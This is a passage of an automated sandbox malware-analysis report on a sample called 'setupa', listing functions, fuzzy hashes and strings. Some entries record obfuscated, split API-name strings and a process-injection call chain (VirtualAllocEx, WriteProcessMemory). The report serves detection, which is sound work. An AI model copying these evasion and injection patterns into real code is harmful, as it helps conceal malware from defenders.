7ff689727686-7ff689727689 286->289 290 7ff689727679-7ff68972767b 286->290 287->172 289->276 294 7ff68972768b-7ff68972769e call 7ff689644895 289->294 290->289 293 7ff68972767d 290->293 292->239 293->286 302 7ff6897276a7-7ff6897276ab 294->302 302->276 304 7ff6897276a0-7ff6897276a2 302->304 304->276 305 7ff6897276a4 304->305 305->302
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$InformationTimeZone
                                                                                                              • String ID: -$:$:$?$Eastern Standard Time$Eastern Summer Time
                                                                                                              • API String ID: 1904278450-2354618740
                                                                                                              • Opcode ID: 82ba0ddb89d93bf66aa19cef63e2ca7a811afcc756a40b34f9db031fedace250
                                                                                                              • Instruction ID: d61eabb52506a48834a53196347bb2d8f24264570483770d94903cefd81af5f5
                                                                                                              • Opcode Fuzzy Hash: 82ba0ddb89d93bf66aa19cef63e2ca7a811afcc756a40b34f9db031fedace250
                                                                                                              • Instruction Fuzzy Hash: 41E1D232A18682CAF7609F7599515A93B92FF88FC5F44113DEA4EC2A95DF3CE481CB00
                                                                                                              Function 00007FF689643D78 Relevance: 3.1, APIs: 2, Instructions: 67nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorInformationProcessQueryStatus
                                                                                                              • String ID:
                                                                                                              • API String ID: 712673026-0
                                                                                                              • Opcode ID: 3ed113cdca4e8b60ae5bb97ce9939c181b4c4b98c75fe3b7dc5bb1bbb060d088
                                                                                                              • Instruction ID: 18b122ba0bc7d77710df1cc4a3e3ac5f7d4d310368fc6fd9f9945c998d1a1ace
                                                                                                              • Opcode Fuzzy Hash: 3ed113cdca4e8b60ae5bb97ce9939c181b4c4b98c75fe3b7dc5bb1bbb060d088
                                                                                                              • Instruction Fuzzy Hash: B021A122B0564289FB20EF61D4507ED27A0BF45BE9F004238DE1D97796DE38E485C740
                                                                                                              Function 00007FF689645F15 Relevance: .8, Instructions: 825COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfcc3d223c2ca2153cf332cbcdc9e480dd5cff7cae649d9e46a30e94375ee156
                                                                                                              • Instruction ID: a9022a723c02e1777f4f4fc06b1859a42c2c468db3fb30580d0520b1d5ecf023
                                                                                                              • Opcode Fuzzy Hash: cfcc3d223c2ca2153cf332cbcdc9e480dd5cff7cae649d9e46a30e94375ee156
                                                                                                              • Instruction Fuzzy Hash: 07827B61E49A63C5FA959F6598A06B822A0FF45FC2B14403EED4EE37A5DE3CA4C1D340
                                                                                                              Function 00007FF6896427F2 Relevance: 19.3, APIs: 4, Strings: 7, Instructions: 54libraryloaderwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                              • String ID: .$3$MessoxWu$e$l$oxW$u
                                                                                                              • API String ID: 2780580303-3595077490
                                                                                                              • Opcode ID: 03e146ecaf3a1edfc9f424c540d651c7a8c67f3faa4cca24a572b445dab155df
                                                                                                              • Instruction ID: 6c5892a6700a6f936808c1982786841f2ec77d741f1142e2c5ecba9fef7854a3
                                                                                                              • Opcode Fuzzy Hash: 03e146ecaf3a1edfc9f424c540d651c7a8c67f3faa4cca24a572b445dab155df
                                                                                                              • Instruction Fuzzy Hash: 48116776B14710CAFB018FA2A8484AC3BB8BB48FC8B198439CE1D67B08DF78C545DB40
                                                                                                              Function 00007FF689641FB4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 45libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeGlobalLoadMemoryProcStatus
                                                                                                              • String ID: .dll$el32$kern$usEx
                                                                                                              • API String ID: 994989557-3581339799
                                                                                                              • Opcode ID: 2d4a219a3fcb6b2857654e431c03e82994e30dc387f18776065826204c00a663
                                                                                                              • Instruction ID: fd593997ede1eb63b17b47046a07cf8367e0d1617a5d3de2b1f71fee5774a6a5
                                                                                                              • Opcode Fuzzy Hash: 2d4a219a3fcb6b2857654e431c03e82994e30dc387f18776065826204c00a663
                                                                                                              • Instruction Fuzzy Hash: 49113776B49B81DDEB11CF65E4103AC63A1FB98B84F48843DDE4D92B48EE38D258C794
                                                                                                              Function 00007FF68972780C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 275timeCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 586 7ff68972780c-7ff689727836 call 7ff689646f28 call 7ff689647ebe 591 7ff6897279cb-7ff689727ab1 call 7ff68964579a call 7ff689647086 586->591 592 7ff68972783c-7ff689727847 call 7ff689647fa4 586->592 606 7ff689727aba-7ff689727abd 591->606 607 7ff689727ab3-7ff689727ab8 591->607 598 7ff6897279b6-7ff6897279ca call 7ff68964579a 592->598 599 7ff68972784d-7ff689727858 call 7ff6896441ec 592->599 598->591 608 7ff68972785e-7ff689727878 call 7ff689648e3b call 7ff6897a84f0 599->608 609 7ff6897279a1-7ff6897279b5 call 7ff68964579a 599->609 611 7ff689727abf-7ff689727ac2 606->611 612 7ff689727ac4-7ff689727ad4 call 7ff6896435bc 606->612 610 7ff689727b08-7ff689727b1a 607->610 624 7ff68972787e-7ff689727881 608->624 609->598 615 7ff689727b2b call 7ff68972780c 610->615 616 7ff689727b1c-7ff689727b1f 610->616 611->610 626 7ff689727ad6 612->626 627 7ff689727adf-7ff689727afa call 7ff689647086 612->627 628 7ff689727b30-7ff689727b5c call 7ff689648e3b call 7ff68964847c 615->628 616->615 620 7ff689727b21-7ff689727b29 call 7ff689727528 616->620 620->628 629 7ff689727887-7ff6897278a9 624->629 630 7ff68972797a-7ff6897279a0 call 7ff68964266c call 7ff689648ac6 call 7ff6896459fc 624->630 632 7ff689727ad8-7ff689727add call 7ff689648e3b 626->632 641 7ff689727afc-7ff689727aff 627->641 642 7ff689727b01-7ff689727b03 call 7ff689648e3b 627->642 636 7ff6897278ab-7ff6897278b0 629->636 637 7ff6897278b3-7ff6897278ba 629->637 632->611 636->637 644 7ff6897278bc-7ff6897278c4 637->644 645 7ff6897278d4-7ff6897278d7 637->645 641->632 642->610 644->645 650 7ff6897278c6-7ff6897278d2 644->650 651 7ff6897278da-7ff689727916 call 7ff689645ae7 WideCharToMultiByte 645->651 650->651 658 7ff689727926-7ff689727929 651->658 659 7ff689727918-7ff68972791b 651->659 661 7ff68972792c-7ff689727962 WideCharToMultiByte 658->661 659->658 660 7ff68972791d-7ff689727924 659->660 660->661 662 7ff689727973-7ff689727977 661->662 663 7ff689727964-7ff689727967 661->663 662->630 663->662 664 7ff689727969-7ff689727971 663->664 664->630
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$InformationTimeZone
                                                                                                              • String ID: ?$Eastern Standard Time$Eastern Summer Time
                                                                                                              • API String ID: 1904278450-688781733
                                                                                                              • Opcode ID: 3605493d57d11c642bbfc623775cdb0dd30657c2ed1a5ad0856d88a304b95ca4
                                                                                                              • Instruction ID: dc4051b6ed9ca37f52dd252c24c0d4cfbbc2113c7be08d2b6f0ab9de4afda6c0
                                                                                                              • Opcode Fuzzy Hash: 3605493d57d11c642bbfc623775cdb0dd30657c2ed1a5ad0856d88a304b95ca4
                                                                                                              • Instruction Fuzzy Hash: 59617E32A18642CAF760DF61E9805A977A5FF48FD5F44013AEA4EC6A95DF3CE481CB40
                                                                                                              Function 00007FF68964243C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 40memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocErrorLastVirtual
                                                                                                              • String ID: Virt$lloc$ualA
                                                                                                              • API String ID: 497505419-1619206022
                                                                                                              • Opcode ID: 083f7b0d19613bb60fa680645b654152f973e887b00eecdd096ea0dff258c669
                                                                                                              • Instruction ID: 90c6a93064ec393e86d798d4861566cd70acd14f10b858747c77d1084823a645
                                                                                                              • Opcode Fuzzy Hash: 083f7b0d19613bb60fa680645b654152f973e887b00eecdd096ea0dff258c669
                                                                                                              • Instruction Fuzzy Hash: 0F118C22B05641D9FB209FB5D4003EE2771BF44B99F404239CA1CA7B99EF38D244C748
                                                                                                              Function 00007FF689644D04 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 38COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExecuteLibraryLoadShell
                                                                                                              • String ID: dll$l32.$runa$shel
                                                                                                              • API String ID: 186556386-4073712556
                                                                                                              • Opcode ID: cc3b68a7b99cae8f412c900914edf99db2bfc8ce90aa8595becd14ee2b522169
                                                                                                              • Instruction ID: 8f4957533ce38e2e073832824d2dd48229ce0fb3b2fd5fc836652dba8510ee34
                                                                                                              • Opcode Fuzzy Hash: cc3b68a7b99cae8f412c900914edf99db2bfc8ce90aa8595becd14ee2b522169
                                                                                                              • Instruction Fuzzy Hash: 74112072B08A018EE310CFA0E4403AC73B6FB48788F804429DA4CA2A49DF78D258CB94
                                                                                                              Function 00007FF689646BCC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 00007FF689646B1D: CreateJobObjectW.KERNEL32 ref: 00007FF689668279
                                                                                                                • Part of subcall function 00007FF689646B1D: GetLastError.KERNEL32 ref: 00007FF68966828D
                                                                                                                • Part of subcall function 00007FF68964243C: VirtualAllocEx.KERNEL32 ref: 00007FF689668647
                                                                                                                • Part of subcall function 00007FF68964243C: GetLastError.KERNEL32 ref: 00007FF689668662
                                                                                                                • Part of subcall function 00007FF689641717: WriteProcessMemory.KERNEL32 ref: 00007FF689668802
                                                                                                                • Part of subcall function 00007FF68964427D: SetInformationJobObject.KERNEL32 ref: 00007FF6896685B2
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00007FF6896661F6
                                                                                                                • Part of subcall function 00007FF689642EA0: AssignProcessToJobObject.KERNEL32 ref: 00007FF68966802A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ObjectProcess$ErrorLast$AllocAssignCreateCurrentInformationMemoryVirtualWrite
                                                                                                              • String ID: GlideXClipboardxJob
                                                                                                              • API String ID: 147658365-2727544021
                                                                                                              • Opcode ID: 7cb3b5fe375f708b48daf5e3a82ba18d95056bcb5c822a5c054bcb50d7926c6d
                                                                                                              • Instruction ID: 243ac18fc586a2a4f97a90d113ac129356d71aec846dc4e1e4ba87e57516bbd3
                                                                                                              • Opcode Fuzzy Hash: 7cb3b5fe375f708b48daf5e3a82ba18d95056bcb5c822a5c054bcb50d7926c6d
                                                                                                              • Instruction Fuzzy Hash: 64315222B04941C1EA20AF52E4A10ED7760FFD5FD1F544236EA5E97BA6CF28D585DB00
                                                                                                              Function 00007FF689642667 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 5781bc11684749c4696aa0ddf9a254fe49b282516b420466c1c6a8e00f95d53c
                                                                                                              • Instruction ID: 331baa4839185bbd85266ac5e492e32cf816604bfd4c0a35c39ba19cc52052bf
                                                                                                              • Opcode Fuzzy Hash: 5781bc11684749c4696aa0ddf9a254fe49b282516b420466c1c6a8e00f95d53c
                                                                                                              • Instruction Fuzzy Hash: 7B116736A08781CAE6609F56E8547AEB760FB88FC0F548139EE8D83745DF38D945CB40
